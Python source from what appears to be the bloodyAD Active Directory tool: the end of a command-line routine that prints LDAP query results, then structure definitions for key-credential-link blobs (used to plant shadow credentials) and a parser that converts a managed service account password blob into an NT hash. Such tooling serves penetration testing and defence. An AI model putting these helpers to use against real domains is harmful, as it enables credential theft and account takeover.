            print(']')

        # Handle async generator, regular generator, coroutine, or other
        if hasattr(result, "__aiter__"):
            # Async generator
            if args.json:
                async def json_async_stream():
                    first = True
                    print('[', end='')
                    async for entry in result:
                        if not first:
                            print(',', end='')
                        print(json.dumps(json_serialize_entry(entry), indent=2), end='')
                        first = False
                    print(']')
                await json_async_stream()
            else:
                async for entry in result:
                    print_human_entry(entry)
        else:
            # Coroutine or other
            output = await result
            output_type = type(output)
            if not output or output_type == bool:
                return
            if output_type not in [list, dict, types.GeneratorType]:
                if args.json:
                    print(json.dumps({"result": str(output)}, indent=2))
                else:
                    print("\n" + str(output))
                return
            if args.json:
                print_json_stream(output)
            else:
                for entry in output:
                    print_human_entry(entry)

    finally:
        await conn.closeLdap()


# Gets unparsed doc and returns a tuple of two values
# first is function description (starts at the beginning of the string and ends before two newlines)
# second is a list of parameter descriptions
# (other part of the string, one parameter description per line, starting with :param param_name:)
def doc_parser(doc):
    doc_parsed = doc.splitlines()
    return doc_parsed[0], doc_parsed[2:]


def json_serialize_entry(entry):
    """
    Convert an entry to JSON-serializable format by converting custom objects to strings
    """
    if isinstance(entry, dict):
        return {k: json_serialize_entry(v) for k, v in entry.items()}
    elif isinstance(entry, (list, set, types.GeneratorType)):
        return [json_serialize_entry(v) for v in entry]
    else:
        # Convert custom objects to string representation
        return str(entry)


def print_entry(entryname, entry):
    if type(entry) in [list, set, types.GeneratorType]:
        i = 0
        simple_entries = []
        length = len(entry)
        i_str = ""
        for v in entry:
            if length > 1:
                i_str = f".{i}"
            entry_str = print_entry(f"{entryname}{i_str}", v)
            i += 1
            if not (entry_str is None or entry_str == ""):
                simple_entries.append(entry_str)
        if simple_entries:
            print(f"{entryname}: {'; '.join([str(v) for v in simple_entries])}")
    elif type(entry) is dict:
        length = len(entry)
        k_str = ""
        for k in entry:
            if length > 1:
                k_str = f".{k}"
            entry_str = print_entry(f"{entryname}{k_str}", entry[k])
            if not (entry_str is None or entry_str == ""):
                print(f"{entryname}.{k}: {entry_str}")
    else:
        return entry


if __name__ == "__main__":
    asyncio.run(main())



from bloodyAD.formatters.structure import Structure
from bloodyAD import md4
import hashlib
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat


class BCRYPT_RSAKEY_BLOB(Structure):
    structure = (
        ("Magic", "<I=0x31415352"),
        ("BitLength", "<I=2048"),
        ("cbPublicExp", "<I=3"),
        ("cbModulus", "<I=256"),
        ("cbPrime1", "<I=0"),
        ("cbPrime2", "<I=0"),
        ("exponent", "3s"),
        ("modulus", "256s"),
    )


class KEYCREDENTIALLINK_ENTRY(Structure):
    """
    KEYCREDENTIALLINK_ENTRY - [MS-ADTS] section 2.2.20.3
    """

    # KEYCREDENTIALLINK_ENTRY Identifiers - [MS-ADTS] 2.2.20.6
    identifiers = {
        "KeyID": 0x01,
        "KeyHash": 0x02,
        "KeyMaterial": 0x03,
        "KeyUsage": 0x04,
        "KeySource": 0x05,
        "DeviceId": 0x06,
        "CustomKeyInformation": 0x07,
        "KeyApproximateLastLogonTimeStamp": 0x08,
        "KeyCreationTime": 0x09,
    }

    # Key Credential Link Constants - [MS-ADTS] 2.2.20.1
    KeyUsage_values = {
        "KEY_USAGE_NGC": 0x01,
        "KEY_USAGE_FIDO": 0x07,
        "KEY_USAGE_FEK": 0x08,
    }
    KEY_SOURCE_AD = 0

    commonHdr = (("Length", "<H-Value"), ("Identifier", "<B"))

    structure = (("Value", ":"),)

    def __init__(self, data=None, identifier=None, **kwargs):
        super().__init__(data, **kwargs)

        if identifier:
            self["Identifier"] = self.identifiers[identifier]

    def toDict(self):
        identifier = [
            i for i in self.identifiers if self.identifiers[i] == self["Identifier"]
        ][0]
        return {identifier: self["Value"].hex()}


class KEYCREDENTIALLINK_BLOB(Structure):
    """
    KEYCREDENTIALLINK_BLOB - [MS-ADTS] section 2.2.20.2
    """

    KEY_CREDENTIAL_LINK_VERSION_2 = 0x200

    commonHdr = (("Version", "<I=self.KEY_CREDENTIAL_LINK_VERSION_2"),)
    structure = (("KEYCREDENTIALLINK_ENTRY_LIST", "*:", KEYCREDENTIALLINK_ENTRY),)

    # Structure class doesn't handle correctly unpacking variable size array with custom format
    # so we have to do it ourselves. First we take it as raw data and then we're unpacking it
    # using the underlying entry structure with header length
    def __init__(self, data=None, **kwargs):
        if data:
            self.structure = (("KEYCREDENTIALLINK_ENTRY_LIST", ":"),)
            super().__init__(data, **kwargs)
            raw_blob = self["KEYCREDENTIALLINK_ENTRY_LIST"]
            entries = []
            while raw_blob:
                entry = KEYCREDENTIALLINK_ENTRY(raw_blob)
                # if entry["Identifier"] not in [entry.identifiers["CustomKeyInformation"], entry.identifiers["KeyApproximateLastLogonTimeStamp"], entry.identifiers["KeyCreationTime"], entry.identifiers["DeviceId"], entry.identifiers["DeviceId"], entry.identifiers["KeyHash"], entry.identifiers["KeyUsage"], entry.identifiers["KeySource"]]:
                entries.append(entry)
                raw_blob = raw_blob[2 + 1 + entry["Length"] :]

            self.structure = (
                ("KEYCREDENTIALLINK_ENTRY_LIST", "*:", KEYCREDENTIALLINK_ENTRY),
            )
            self["KEYCREDENTIALLINK_ENTRY_LIST"] = entries
        else:
            super().__init__(data, **kwargs)

    # Here I just put mandatory entries, could evolve in the future
    def keyCredentialLink_from_x509(self, cert):
        key_material = KEYCREDENTIALLINK_ENTRY(identifier="KeyMaterial")

        # We use standard format mentioned in [MS-ADTS] 2.2.20.5.1 KEY_USAGE_NGC
        # and specified as RSAPublicKey in rfc8017 Appendix C - Main structures - p.72
        # BCRYPT_RSAKEY_BLOB is another option undocumented in [MS-ADTS]
        key_material["Value"] = cert.public_key().public_bytes(
            Encoding.DER, PublicFormat.PKCS1
        )

        key_id = KEYCREDENTIALLINK_ENTRY(identifier="KeyID")
        key_id["Value"] = hashlib.sha256(key_material["Value"]).digest()

        self["KEYCREDENTIALLINK_ENTRY_LIST"] = [key_id, key_material]

    def toDict(self):
        return {
            k: v
            for entry in self["KEYCREDENTIALLINK_ENTRY_LIST"]
            for k, v in entry.toDict().items()
        }

    def getKeyID(self):
        return [
            entry["Value"]
            for entry in self["KEYCREDENTIALLINK_ENTRY_LIST"]
            if entry["Identifier"] == entry.identifiers["KeyID"]
        ][0]


class MSDS_MANAGEDPASSWORD_BLOB(Structure):
    structure = (
        ("Version", "<H=0x01"),
        ("Reserved", "<H=0x00"),
        ("Length", "<I"),
        ("CurrentPasswordOffset", "<H"),
        ("PreviousPasswordOffset", "<H"),
        ("QueryPasswordIntervalOffset", "<H"),
        ("UnchangedPasswordIntervalOffset", "<H"),
        ("CurrentPassword", "u"),
        ("PreviousPassword", "u"),
        # ('AlignmentPadding',':'),
        ("QueryPasswordInterval", "<Q"),
        ("UnchangedPasswordInterval", "<Q"),
    )

    def toNtHash(self):
        return md4.MD4(self["CurrentPassword"]).hexdigest()
